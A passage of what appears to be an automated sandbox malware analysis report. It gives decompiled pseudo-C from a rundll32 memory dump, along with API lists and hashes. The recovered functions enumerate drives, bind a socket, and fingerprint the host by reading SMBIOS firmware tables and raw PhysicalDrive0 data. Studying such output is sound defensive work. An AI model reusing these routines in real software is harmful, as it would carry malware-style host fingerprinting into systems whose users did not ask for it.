                                                                                              					return E04275AFE(_v8 ^ _t107);
                                                                                              				} else {
                                                                                              					_push(_t98);
                                                                                              					_t105 = GetLogicalDriveStringsW(0, 0);
                                                                                              					_t115 = _t105;
                                                                                              					if(_t115 == 0) {
                                                                                              						L15:
                                                                                              						goto L16;
                                                                                              					} else {
                                                                                              						_t5 = _t105 + 1; // 0x1
                                                                                              						_push(__ebx);
                                                                                              						_push( ~(_t115 > 0) | _t5 * 0x00000002);
                                                                                              						_t46 = E04275B55( ~(_t115 > 0) | _t5 * 0x00000002, _t105, _t115);
                                                                                              						_t86 = 2 + _t105 * 2;
                                                                                              						_t74 = _t46;
                                                                                              						_v544 = _t74;
                                                                                              						E0427DEA0(GetLogicalDriveStringsW, _t74, 0, 2 + _t105 * 2);
                                                                                              						_t110 = _t109 + 0x10;
                                                                                              						if(GetLogicalDriveStringsW(_t105, _t74) != 0) {
                                                                                              							_t49 =  *0x429edb0; // 0x3a0020
                                                                                              							_v16 = _t49;
                                                                                              							_t50 =  *0x429edb4; // 0x0
                                                                                              							_push(0x208);
                                                                                              							_v12 = _t50;
                                                                                              							_t51 = E04275B55(_t86, _t105, __eflags);
                                                                                              							_t111 = _t110 + 4;
                                                                                              							_t101 = _t51;
                                                                                              							_t106 = _t74;
                                                                                              							while(1) {
                                                                                              								_t87 =  *_t106;
                                                                                              								_v16 =  *_t106;
                                                                                              								_t53 = QueryDosDeviceW( &_v16, _t101, 0x104);
                                                                                              								__eflags = _t53;
                                                                                              								if(_t53 != 0) {
                                                                                              									goto L8;
                                                                                              								}
                                                                                              								_t64 = GetLastError();
                                                                                              								__eflags = _t64 - 0x7a;
                                                                                              								if(_t64 == 0x7a) {
                                                                                              									E04275B0F(_t101);
                                                                                              									_t87 =  ~(__eflags > 0) | 2;
                                                                                              									_push( ~(__eflags > 0) | 2);
                                                                                              									_t68 = E04275B55( ~(__eflags > 0) | 2, _t106, __eflags);
                                                                                              									_t111 = _t111 + 8;
                                                                                              									_t101 = _t68;
                                                                                              									_t70 = QueryDosDeviceW( &_v16, _t101, 1);
                                                                                              									__eflags = _t70;
                                                                                              									if(_t70 != 0) {
                                                                                              										goto L8;
                                                                                              									}
                                                                                              								}
                                                                                              								L14:
                                                                                              								E04275B0F(_v544);
                                                                                              								E04275B0F(_t101);
                                                                                              								goto L15;
                                                                                              								L8:
                                                                                              								_t76 = lstrlenW(_t101);
                                                                                              								_t56 = E0427F58A(_t76, _t87, _t106,  &_v536, _t101, _t76);
                                                                                              								_t111 = _t111 + 0xc;
                                                                                              								__eflags = _t56;
                                                                                              								if(_t56 == 0) {
                                                                                              									wsprintfW(_v540, L"%s%s",  &_v16,  &_v536 + _t76 * 2);
                                                                                              									_t111 = _t111 + 0x10;
                                                                                              								} else {
                                                                                              									asm("o16 nop [eax+eax]");
                                                                                              									do {
                                                                                              										_t63 =  *_t106 & 0x0000ffff;
                                                                                              										_t106 =  &(_t106[1]);
                                                                                              										__eflags = _t63;
                                                                                              									} while (_t63 != 0);
                                                                                              									__eflags =  *_t106 - _t63;
                                                                                              									if( *_t106 != _t63) {
                                                                                              										continue;
                                                                                              									}
                                                                                              								}
                                                                                              								goto L14;
                                                                                              							}
                                                                                              						} else {
                                                                                              							E04275B0F(_t74);
                                                                                              							return E04275AFE(_v8 ^ _t107);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}


































                                                                                              0x042645c0
                                                                                              0x042645c9
                                                                                              0x042645d0
                                                                                              0x042645db
                                                                                              0x042645e0
                                                                                              0x042645e6
                                                                                              0x042645f9
                                                                                              0x042645fe
                                                                                              0x04264601
                                                                                              0x0426460e
                                                                                              0x04264616
                                                                                              0x0426477d
                                                                                              0x04264780
                                                                                              0x0426478b
                                                                                              0x0426461c
                                                                                              0x0426461c
                                                                                              0x04264629
                                                                                              0x0426462b
                                                                                              0x0426462d
                                                                                              0x0426477c
                                                                                              0x00000000
                                                                                              0x04264633
                                                                                              0x04264635
                                                                                              0x0426463f
                                                                                              0x04264647
                                                                                              0x04264648
                                                                                              0x0426464d
                                                                                              0x04264654
                                                                                              0x0426465a
                                                                                              0x04264660
                                                                                              0x04264665
                                                                                              0x0426466e
                                                                                              0x0426468a
                                                                                              0x0426468f
                                                                                              0x04264692
                                                                                              0x04264698
                                                                                              0x0426469d
                                                                                              0x042646a1
                                                                                              0x042646a6
                                                                                              0x042646a9
                                                                                              0x042646ab
                                                                                              0x042646ad
                                                                                              0x042646ad
                                                                                              0x042646c0
                                                                                              0x042646c4
                                                                                              0x042646c6
                                                                                              0x042646c8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042646ca
                                                                                              0x042646d0
                                                                                              0x042646d3
                                                                                              0x042646da
                                                                                              0x042646f2
                                                                                              0x042646f4
                                                                                              0x042646f5
                                                                                              0x042646fa
                                                                                              0x042646fd
                                                                                              0x04264706
                                                                                              0x04264708
                                                                                              0x0426470a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426470a
                                                                                              0x04264767
                                                                                              0x0426476d
                                                                                              0x04264773
                                                                                              0x00000000
                                                                                              0x0426470c
                                                                                              0x04264713
                                                                                              0x0426471e
                                                                                              0x04264723
                                                                                              0x04264726
                                                                                              0x04264728
                                                                                              0x0426475e
                                                                                              0x04264764
                                                                                              0x0426472a
                                                                                              0x0426472a
                                                                                              0x04264730
                                                                                              0x04264730
                                                                                              0x04264733
                                                                                              0x04264736
                                                                                              0x04264736
                                                                                              0x0426473b
                                                                                              0x0426473e
                                                                                              0x00000000
                                                                                              0x04264740
                                                                                              0x0426473e
                                                                                              0x00000000
                                                                                              0x04264728
                                                                                              0x04264670
                                                                                              0x04264671
                                                                                              0x04264689
                                                                                              0x04264689
                                                                                              0x0426466e
                                                                                              0x0426462d

                                                                                              APIs
                                                                                              • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,?,?,?,?,74CB69A0), ref: 0426460E
                                                                                              • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,74CB69A0), ref: 04264627
                                                                                              • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,74CB69A0), ref: 0426466A
                                                                                              • QueryDosDeviceW.KERNEL32(?,00000000,00000104,?,?,?,?,00000000,?,?,?,?,?,74CB69A0), ref: 042646C4
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,74CB69A0), ref: 042646CA
                                                                                              • QueryDosDeviceW.KERNEL32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 04264706
                                                                                              • lstrlenW.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,74CB69A0), ref: 0426470D
                                                                                              • wsprintfW.USER32 ref: 0426475E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeviceDriveLogicalQueryStrings$ErrorFileImageLastNameProcesslstrlenwsprintf
                                                                                              • String ID: %s%s
                                                                                              • API String ID: 1509662898-3252725368
                                                                                              • Opcode ID: 6c9d6487ff7316b422772084c8a83e4ffe661c21c3ea4eff6ace79f7c8004569
                                                                                              • Instruction ID: 0f702b06575b38b134158e926ae9df4dfc3982dbf40d10df4782f6c66545e114
                                                                                              • Opcode Fuzzy Hash: 6c9d6487ff7316b422772084c8a83e4ffe661c21c3ea4eff6ace79f7c8004569
                                                                                              • Instruction Fuzzy Hash: F741C971F10209ABEB10BB74AC85FBEB3ACDF45304F5400A9E90AE7180EA75AD418B65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 38%
                                                                                              			E042723F0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                                                              				signed int _v8;
                                                                                              				signed short _v36;
                                                                                              				intOrPtr _v40;
                                                                                              				signed int _t19;
                                                                                              				intOrPtr _t21;
                                                                                              				long _t25;
                                                                                              				long _t30;
                                                                                              				signed short _t36;
                                                                                              				intOrPtr* _t38;
                                                                                              				void* _t49;
                                                                                              				long _t53;
                                                                                              				signed int _t54;
                                                                                              
                                                                                              				_t19 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t19 ^ _t54;
                                                                                              				_t49 = __ecx;
                                                                                              				_t36 = 0;
                                                                                              				_t38 = _a4;
                                                                                              				if(_t38 == 0 ||  *_t38 == 0) {
                                                                                              					_t21 = 0;
                                                                                              				} else {
                                                                                              					_t3 = _t36 + 1; // 0x1
                                                                                              					_t21 = _t3;
                                                                                              				}
                                                                                              				_v40 = _t21;
                                                                                              				_t52 =  !=  ? _t38 : L"0.0.0.0";
                                                                                              				_v36 = 0;
                                                                                              				_v36 = E0426D020( !=  ? _t38 : L"0.0.0.0",  !=  ? _t38 : L"0.0.0.0");
                                                                                              				_t25 = E0426D0D0(_t36, 0, _t49, _t52,  &_v36);
                                                                                              				if(_t25 == 0) {
                                                                                              					L11:
                                                                                              					__imp__#111();
                                                                                              					 *((intOrPtr*)(_t49 + 0x58)) = 3;
                                                                                              					SetLastError(_t25);
                                                                                              					goto L12;
                                                                                              				} else {
                                                                                              					_t25 = _v36 & 0x0000ffff;
                                                                                              					__imp__#23(_t25, 1, 6);
                                                                                              					_t53 = _t25;
                                                                                              					if(_t53 == 0xffffffff) {
                                                                                              						goto L11;
                                                                                              					}
                                                                                              					_t29 =  ==  ? 0x10 : 0x1c;
                                                                                              					_t30 =  &_v36;
                                                                                              					__imp__#2(_t53, _t30,  ==  ? 0x10 : 0x1c);
                                                                                              					if(_t30 == 0xffffffff) {
                                                                                              						__imp__#111();
                                                                                              						 *((intOrPtr*)(_t49 + 0x58)) = 4;
                                                                                              						SetLastError(_t30);
                                                                                              						__imp__#3(_t53);
                                                                                              					} else {
                                                                                              						 *((intOrPtr*)(_t49 + 0x40)) = E0426D3B0(_t53);
                                                                                              						 *((intOrPtr*)(_t49 + 0x44)) = E0426D420(_t53);
                                                                                              						if(_v40 != _t36) {
                                                                                              							E04272040( &_v36, _t49 + 0x5c);
                                                                                              						}
                                                                                              						_t36 = 1;
                                                                                              						__imp__#3(_t53);
                                                                                              					}
                                                                                              					L12:
                                                                                              					return E04275AFE(_v8 ^ _t54);
                                                                                              				}
                                                                                              			}















                                                                                              0x042723f6
                                                                                              0x042723fd
                                                                                              0x04272403
                                                                                              0x04272405
                                                                                              0x04272407
                                                                                              0x0427240c
                                                                                              0x04272418
                                                                                              0x04272413
                                                                                              0x04272413
                                                                                              0x04272413
                                                                                              0x04272413
                                                                                              0x0427241c
                                                                                              0x04272424
                                                                                              0x0427242b
                                                                                              0x04272434
                                                                                              0x04272440
                                                                                              0x0427244a
                                                                                              0x042724d9
                                                                                              0x042724d9
                                                                                              0x042724e0
                                                                                              0x042724e7
                                                                                              0x00000000
                                                                                              0x04272450
                                                                                              0x04272450
                                                                                              0x04272459
                                                                                              0x0427245f
                                                                                              0x04272464
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04272475
                                                                                              0x04272479
                                                                                              0x0427247e
                                                                                              0x04272487
                                                                                              0x042724bc
                                                                                              0x042724c3
                                                                                              0x042724ca
                                                                                              0x042724d1
                                                                                              0x04272489
                                                                                              0x04272492
                                                                                              0x0427249a
                                                                                              0x042724a0
                                                                                              0x042724a9
                                                                                              0x042724a9
                                                                                              0x042724af
                                                                                              0x042724b4
                                                                                              0x042724b4
                                                                                              0x042724ed
                                                                                              0x042724ff
                                                                                              0x042724ff

                                                                                              APIs
                                                                                              • socket.WS2_32(?,00000001,00000006), ref: 04272459
                                                                                              • bind.WS2_32(00000000,00000002,0000001C), ref: 0427247E
                                                                                              • closesocket.WS2_32(00000000), ref: 042724B4
                                                                                              • WSAGetLastError.WS2_32 ref: 042724BC
                                                                                              • SetLastError.KERNEL32 ref: 042724CA
                                                                                              • closesocket.WS2_32(00000000), ref: 042724D1
                                                                                              • WSAGetLastError.WS2_32 ref: 042724D9
                                                                                              • SetLastError.KERNEL32 ref: 042724E7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$closesocket$bindsocket
                                                                                              • String ID: 0.0.0.0
                                                                                              • API String ID: 3276209097-3771769585
                                                                                              • Opcode ID: 0f8c7da0be7696b658a55409dddd27f8fb5894d1221e1be60500c99b87f6f99e
                                                                                              • Instruction ID: db866112758a972ca81a56fbcd5e9990778018eea24c124d50160c80e435a137
                                                                                              • Opcode Fuzzy Hash: 0f8c7da0be7696b658a55409dddd27f8fb5894d1221e1be60500c99b87f6f99e
                                                                                              • Instruction Fuzzy Hash: 01319571B25219DBDB14AFA9E8586AE77B8FF08314F00017AD906D3180DB79AD41C7B5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 74%
                                                                                              			E04266780(void* __ecx, void* __edi, char* __esi) {
                                                                                              				intOrPtr _v8;
                                                                                              				signed int _v16;
                                                                                              				struct _OVERLAPPED* _v32;
                                                                                              				struct _OVERLAPPED* _v36;
                                                                                              				void _v40;
                                                                                              				char _v44;
                                                                                              				struct _OVERLAPPED* _v48;
                                                                                              				void* _v52;
                                                                                              				long _v56;
                                                                                              				void* _v60;
                                                                                              				intOrPtr _v64;
                                                                                              				signed int _t119;
                                                                                              				_Unknown_base(*)()* _t123;
                                                                                              				intOrPtr _t125;
                                                                                              				void* _t126;
                                                                                              				char _t137;
                                                                                              				char _t138;
                                                                                              				intOrPtr _t140;
                                                                                              				char _t143;
                                                                                              				intOrPtr _t144;
                                                                                              				char _t147;
                                                                                              				intOrPtr _t148;
                                                                                              				void* _t152;
                                                                                              				char _t153;
                                                                                              				intOrPtr _t154;
                                                                                              				intOrPtr _t155;
                                                                                              				intOrPtr _t159;
                                                                                              				intOrPtr _t163;
                                                                                              				intOrPtr _t167;
                                                                                              				intOrPtr _t171;
                                                                                              				void* _t173;
                                                                                              				intOrPtr _t177;
                                                                                              				void* _t178;
                                                                                              				intOrPtr* _t190;
                                                                                              				intOrPtr* _t192;
                                                                                              				intOrPtr* _t194;
                                                                                              				intOrPtr* _t197;
                                                                                              				intOrPtr* _t199;
                                                                                              				intOrPtr* _t202;
                                                                                              				intOrPtr* _t204;
                                                                                              				intOrPtr* _t206;
                                                                                              				void* _t207;
                                                                                              				intOrPtr _t208;
                                                                                              				intOrPtr _t209;
                                                                                              				intOrPtr _t210;
                                                                                              				intOrPtr* _t211;
                                                                                              				intOrPtr* _t212;
                                                                                              				intOrPtr* _t214;
                                                                                              				intOrPtr* _t216;
                                                                                              				intOrPtr* _t218;
                                                                                              				void* _t225;
                                                                                              				long _t226;
                                                                                              				long _t227;
                                                                                              				void* _t228;
                                                                                              				char* _t229;
                                                                                              				char* _t230;
                                                                                              				char* _t231;
                                                                                              				void* _t232;
                                                                                              				char* _t233;
                                                                                              				void* _t234;
                                                                                              				void* _t235;
                                                                                              				void* _t236;
                                                                                              				intOrPtr _t237;
                                                                                              				intOrPtr _t238;
                                                                                              				intOrPtr* _t245;
                                                                                              				long _t246;
                                                                                              				void* _t248;
                                                                                              				struct _OVERLAPPED* _t251;
                                                                                              				intOrPtr* _t253;
                                                                                              				void* _t258;
                                                                                              				signed int _t261;
                                                                                              				void* _t262;
                                                                                              				void* _t263;
                                                                                              				void* _t264;
                                                                                              				intOrPtr _t298;
                                                                                              
                                                                                              				_t250 = __esi;
                                                                                              				_t186 = __ecx;
                                                                                              				_t261 = (_t258 - 0x00000008 & 0xfffffff0) + 4;
                                                                                              				_v8 =  *((intOrPtr*)(_t258 + 4));
                                                                                              				_t256 = _t261;
                                                                                              				_t262 = _t261 - 0x58;
                                                                                              				_t119 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v16 = _t119 ^ _t261;
                                                                                              				_push(__esi);
                                                                                              				asm("xorps xmm0, xmm0");
                                                                                              				_v48 = 0;
                                                                                              				asm("movaps [ebp-0x50], xmm0");
                                                                                              				_t245 = 0;
                                                                                              				asm("movaps [ebp-0x20], xmm0");
                                                                                              				_v64 = 0;
                                                                                              				_t123 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemFirmwareTable");
                                                                                              				_v56 = _t123;
                                                                                              				if(_t123 != 0) {
                                                                                              					_t250 =  *_t123(0x52534d42, 0, 0, 0);
                                                                                              					_t269 = _t250;
                                                                                              					if(_t250 != 0) {
                                                                                              						_push(_t250);
                                                                                              						_t177 = E04275B55(_t186, _t250, _t269);
                                                                                              						_t262 = _t262 + 4;
                                                                                              						_v64 = _t177;
                                                                                              						if(_t177 != 0) {
                                                                                              							_t178 = _v56(0x52534d42, 0, _t177, _t250);
                                                                                              							_t237 = _v64;
                                                                                              							_t250 = _t237 + 8;
                                                                                              							_t238 =  *((intOrPtr*)(_t237 + 4));
                                                                                              							if(_t238 == _t178 + 0xfffffff8) {
                                                                                              								_t186 = 0;
                                                                                              								if(_t238 != 0) {
                                                                                              									while( *_t250 != 1) {
                                                                                              										_t253 = _t250 + ( *(_t250 + 1) & 0x000000ff);
                                                                                              										while( *_t253 != _t245) {
                                                                                              											_t253 = _t253 + 1;
                                                                                              										}
                                                                                              										_t186 = _t186 + 1;
                                                                                              										_t250 = _t253 + 2;
                                                                                              										_t276 = _t186 - _t238;
                                                                                              										if(_t186 < _t238) {
                                                                                              											continue;
                                                                                              										} else {
                                                                                              										}
                                                                                              										goto L11;
                                                                                              									}
                                                                                              									_t245 = E04266710(_t250,  *((intOrPtr*)(_t250 + 4)));
                                                                                              									_t186 = _t250 + 8;
                                                                                              									E04266680(_t250 + 8, ( *(_v64 + 1) & 0x000000ff) * 0x100 + ( *(_v64 + 2) & 0x000000ff),  &_v44);
                                                                                              									asm("movaps xmm0, [ebp-0x20]");
                                                                                              									_t262 = _t262 + 4;
                                                                                              									asm("movaps [ebp-0x50], xmm0");
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				L11:
                                                                                              				_push(0x2000);
                                                                                              				_t225 = E04275B55(_t186, _t250, _t276);
                                                                                              				_t263 = _t262 + 4;
                                                                                              				_t251 = 0;
                                                                                              				_v60 = _t225;
                                                                                              				if(_t225 != 0) {
                                                                                              					E0427DEA0(_t245, _t225, 0, 0x2000);
                                                                                              					_t263 = _t263 + 0xc;
                                                                                              					_v56 = 0;
                                                                                              					asm("xorps xmm0, xmm0");
                                                                                              					_v32 = 0;
                                                                                              					asm("movq [ebp-0x1c], xmm0");
                                                                                              					_v40 = 0;
                                                                                              					_v36 = 0;
                                                                                              					_t173 = CreateFileA("\\\\.\\PhysicalDrive0", 0x80000000, 3, 0, 3, 0, 0);
                                                                                              					_v52 = _t173;
                                                                                              					if(_t173 != 0xffffffff) {
                                                                                              						_t186 =  &_v40;
                                                                                              						DeviceIoControl(_t173, 0x2d1400,  &_v40, 0xc, _v60, 0x2000,  &_v56, 0);
                                                                                              						_t251 =  !=  ? _v60 : 0;
                                                                                              						CloseHandle(_v52);
                                                                                              					}
                                                                                              					_t225 = _v60;
                                                                                              				}
                                                                                              				if(_t245 == 0) {
                                                                                              					_t125 = 0;
                                                                                              					__eflags = 0;
                                                                                              				} else {
                                                                                              					_t218 = _t245;
                                                                                              					_t31 = _t218 + 1; // 0x1
                                                                                              					_v52 = _t31;
                                                                                              					do {
                                                                                              						_t171 =  *_t218;
                                                                                              						_t218 = _t218 + 1;
                                                                                              					} while (_t171 != 0);
                                                                                              					_t186 = _t218 - _v52;
                                                                                              					_t125 = _t218 - _v52 + 1;
                                                                                              					_v48 = _t125;
                                                                                              				}
                                                                                              				if(_t251 != 0) {
                                                                                              					_t208 = _t251->OffsetHigh;
                                                                                              					if(_t208 != 0) {
                                                                                              						_t216 = _t208 + _t225;
                                                                                              						_v52 = _t216 + 1;
                                                                                              						do {
                                                                                              							_t167 =  *_t216;
                                                                                              							_t216 = _t216 + 1;
                                                                                              						} while (_t167 != 0);
                                                                                              						_t125 = _v48 + 1 + _t216 - _v52;
                                                                                              						_v48 = _t125;
                                                                                              					}
                                                                                              					_t209 = _t251->hEvent;
                                                                                              					if(_t209 != 0) {
                                                                                              						_t214 = _t209 + _t225;
                                                                                              						_v52 = _t214 + 1;
                                                                                              						do {
                                                                                              							_t163 =  *_t214;
                                                                                              							_t214 = _t214 + 1;
                                                                                              						} while (_t163 != 0);
                                                                                              						_t125 = _v48 + 1 + _t214 - _v52;
                                                                                              						_v48 = _t125;
                                                                                              					}
                                                                                              					_t210 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                              					if(_t210 != 0) {
                                                                                              						_t212 = _t210 + _t225;
                                                                                              						_v52 = _t212 + 1;
                                                                                              						do {
                                                                                              							_t159 =  *_t212;
                                                                                              							_t212 = _t212 + 1;
                                                                                              						} while (_t159 != 0);
                                                                                              						_t125 = _v48 + 1 + _t212 - _v52;
                                                                                              						_v48 = _t125;
                                                                                              					}
                                                                                              					_t186 =  *((intOrPtr*)(_t251 + 0x18));
                                                                                              					if(_t186 != 0) {
                                                                                              						_t211 = _t186 + _t225;
                                                                                              						_t236 = _t211 + 1;
                                                                                              						do {
                                                                                              							_t155 =  *_t211;
                                                                                              							_t211 = _t211 + 1;
                                                                                              						} while (_t155 != 0);
                                                                                              						_t186 = _t211 - _t236;
                                                                                              						_t125 = _v48 + 1 + _t211 - _t236;
                                                                                              						_t298 = _t125;
                                                                                              						_v48 = _t125;
                                                                                              					}
                                                                                              				}
                                                                                              				_t126 = _t125 + 0x28;
                                                                                              				_push(_t126);
                                                                                              				_v52 = _t126;
                                                                                              				_t226 = E04275B55(_t186, _t251, _t298);
                                                                                              				_t264 = _t263 + 4;
                                                                                              				_v56 = _t226;
                                                                                              				if(_t226 == 0) {
                                                                                              					L68:
                                                                                              					_t246 = _v56;
                                                                                              				} else {
                                                                                              					E0427DEA0(_t245, _t226, 0, _v52);
                                                                                              					_t227 = _v56;
                                                                                              					_t264 = _t264 + 0xc;
                                                                                              					asm("movaps xmm0, [ebp-0x50]");
                                                                                              					 *_t227 = _v48;
                                                                                              					_t136 = 0x28;
                                                                                              					_v48 = 0x28;
                                                                                              					asm("movups [edx+0x4], xmm0");
                                                                                              					if(_t245 != 0) {
                                                                                              						 *((intOrPtr*)(_t227 + 0x14)) = 0x28;
                                                                                              						_t206 = _t245;
                                                                                              						_t152 = _t227 + 0x28 - _t245;
                                                                                              						_v52 = _t152;
                                                                                              						_t235 = _t152;
                                                                                              						asm("o16 nop [eax+eax]");
                                                                                              						do {
                                                                                              							_t153 =  *_t206;
                                                                                              							_t206 = _t206 + 1;
                                                                                              							 *((char*)(_t235 + _t206 - 1)) = _t153;
                                                                                              						} while (_t153 != 0);
                                                                                              						_t227 = _v56;
                                                                                              						_t71 = _t245 + 1; // 0x1
                                                                                              						_t207 = _t71;
                                                                                              						do {
                                                                                              							_t154 =  *_t245;
                                                                                              							_t245 = _t245 + 1;
                                                                                              						} while (_t154 != 0);
                                                                                              						_t72 = _t245 - _t207 + 0x29; // 0x2a
                                                                                              						_t136 = _t72;
                                                                                              						_v48 = _t136;
                                                                                              					}
                                                                                              					if(_t251 == 0) {
                                                                                              						goto L68;
                                                                                              					} else {
                                                                                              						_t248 = _v60;
                                                                                              						if(_t251->OffsetHigh != 0) {
                                                                                              							 *((intOrPtr*)(_t227 + 0x18)) = _t136;
                                                                                              							_t202 = _t251->OffsetHigh + _t248;
                                                                                              							_t233 = _t227 + _t136;
                                                                                              							do {
                                                                                              								_t147 =  *_t202;
                                                                                              								_t202 = _t202 + 1;
                                                                                              								 *_t233 = _t147;
                                                                                              								_t233 = _t233 + 1;
                                                                                              							} while (_t147 != 0);
                                                                                              							_t204 = _t251->OffsetHigh + _t248;
                                                                                              							_t234 = _t204 + 1;
                                                                                              							do {
                                                                                              								_t148 =  *_t204;
                                                                                              								_t204 = _t204 + 1;
                                                                                              							} while (_t148 != 0);
                                                                                              							_t227 = _v56;
                                                                                              							_t136 = _v48 + 1 + _t204 - _t234;
                                                                                              							_v48 = _t136;
                                                                                              						}
                                                                                              						if(_t251->hEvent != 0) {
                                                                                              							 *((intOrPtr*)(_t227 + 0x1c)) = _t136;
                                                                                              							_t197 = _t251->hEvent + _t248;
                                                                                              							_t231 = _t227 + _t136;
                                                                                              							do {
                                                                                              								_t143 =  *_t197;
                                                                                              								_t197 = _t197 + 1;
                                                                                              								 *_t231 = _t143;
                                                                                              								_t231 = _t231 + 1;
                                                                                              							} while (_t143 != 0);
                                                                                              							_t199 = _t251->hEvent + _t248;
                                                                                              							_t232 = _t199 + 1;
                                                                                              							do {
                                                                                              								_t144 =  *_t199;
                                                                                              								_t199 = _t199 + 1;
                                                                                              							} while (_t144 != 0);
                                                                                              							_t136 = _v48 + 1 + _t199 - _t232;
                                                                                              							_v48 = _t136;
                                                                                              						}
                                                                                              						_t246 = _v56;
                                                                                              						if( *((intOrPtr*)(_t251 + 0x14)) == 0) {
                                                                                              							_t228 = _v60;
                                                                                              						} else {
                                                                                              							 *((intOrPtr*)(_t246 + 0x20)) = _t136;
                                                                                              							_t230 = _t136 + _t246;
                                                                                              							_t192 =  *((intOrPtr*)(_t251 + 0x14)) + _v60;
                                                                                              							do {
                                                                                              								_t138 =  *_t192;
                                                                                              								_t192 = _t192 + 1;
                                                                                              								 *_t230 = _t138;
                                                                                              								_t230 = _t230 + 1;
                                                                                              							} while (_t138 != 0);
                                                                                              							_t228 = _v60;
                                                                                              							_t194 =  *((intOrPtr*)(_t251 + 0x14)) + _t228;
                                                                                              							_v52 = _t194 + 1;
                                                                                              							do {
                                                                                              								_t140 =  *_t194;
                                                                                              								_t194 = _t194 + 1;
                                                                                              							} while (_t140 != 0);
                                                                                              							_t136 = _v48 + 1 + _t194 - _v52;
                                                                                              						}
                                                                                              						if( *((intOrPtr*)(_t251 + 0x18)) != 0) {
                                                                                              							 *((intOrPtr*)(_t246 + 0x24)) = _t136;
                                                                                              							_t190 =  *((intOrPtr*)(_t251 + 0x18)) + _t228;
                                                                                              							_t229 = _t136 + _t246;
                                                                                              							do {
                                                                                              								_t137 =  *_t190;
                                                                                              								_t190 = _t190 + 1;
                                                                                              								 *_t229 = _t137;
                                                                                              								_t229 = _t229 + 1;
                                                                                              							} while (_t137 != 0);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				_t128 = _v60;
                                                                                              				if(_v60 != 0) {
                                                                                              					E04275B0F(_t128);
                                                                                              					_t264 = _t264 + 4;
                                                                                              				}
                                                                                              				_t129 = _v64;
                                                                                              				if(_v64 != 0) {
                                                                                              					E04275B0F(_t129);
                                                                                              				}
                                                                                              				return E04275AFE(_v16 ^ _t256);
                                                                                              			}














































































                                                                                              0x04266780
                                                                                              0x04266780
                                                                                              0x04266789
                                                                                              0x04266790
                                                                                              0x04266794
                                                                                              0x04266796
                                                                                              0x04266799
                                                                                              0x042667a0
                                                                                              0x042667a3
                                                                                              0x042667a5
                                                                                              0x042667b1
                                                                                              0x042667b9
                                                                                              0x042667bd
                                                                                              0x042667bf
                                                                                              0x042667c3
                                                                                              0x042667cd
                                                                                              0x042667d3
                                                                                              0x042667d8
                                                                                              0x042667e8
                                                                                              0x042667ea
                                                                                              0x042667ec
                                                                                              0x042667f2
                                                                                              0x042667f3
                                                                                              0x042667f8
                                                                                              0x042667fb
                                                                                              0x04266800
                                                                                              0x0426680e
                                                                                              0x04266811
                                                                                              0x04266817
                                                                                              0x0426681a
                                                                                              0x0426681f
                                                                                              0x04266821
                                                                                              0x04266825
                                                                                              0x04266827
                                                                                              0x04266830
                                                                                              0x04266835
                                                                                              0x04266837
                                                                                              0x04266838
                                                                                              0x0426683d
                                                                                              0x0426683e
                                                                                              0x04266841
                                                                                              0x04266843
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04266845
                                                                                              0x00000000
                                                                                              0x04266843
                                                                                              0x04266851
                                                                                              0x04266873
                                                                                              0x04266876
                                                                                              0x0426687b
                                                                                              0x0426687f
                                                                                              0x04266882
                                                                                              0x04266882
                                                                                              0x04266825
                                                                                              0x0426681f
                                                                                              0x04266800
                                                                                              0x042667ec
                                                                                              0x04266886
                                                                                              0x04266886
                                                                                              0x04266890
                                                                                              0x04266892
                                                                                              0x04266895
                                                                                              0x04266897
                                                                                              0x0426689c
                                                                                              0x042668a5
                                                                                              0x042668aa
                                                                                              0x042668ad
                                                                                              0x042668b0
                                                                                              0x042668b3
                                                                                              0x042668b6
                                                                                              0x042668bb
                                                                                              0x042668cf
                                                                                              0x042668d2
                                                                                              0x042668d8
                                                                                              0x042668de
                                                                                              0x042668ed
                                                                                              0x042668f9
                                                                                              0x04266904
                                                                                              0x04266908
                                                                                              0x04266908
                                                                                              0x0426690e
                                                                                              0x0426690e
                                                                                              0x04266913
                                                                                              0x04266932
                                                                                              0x04266932
                                                                                              0x04266915
                                                                                              0x04266915
                                                                                              0x04266917
                                                                                              0x0426691a
                                                                                              0x04266920
                                                                                              0x04266920
                                                                                              0x04266922
                                                                                              0x04266923
                                                                                              0x04266927
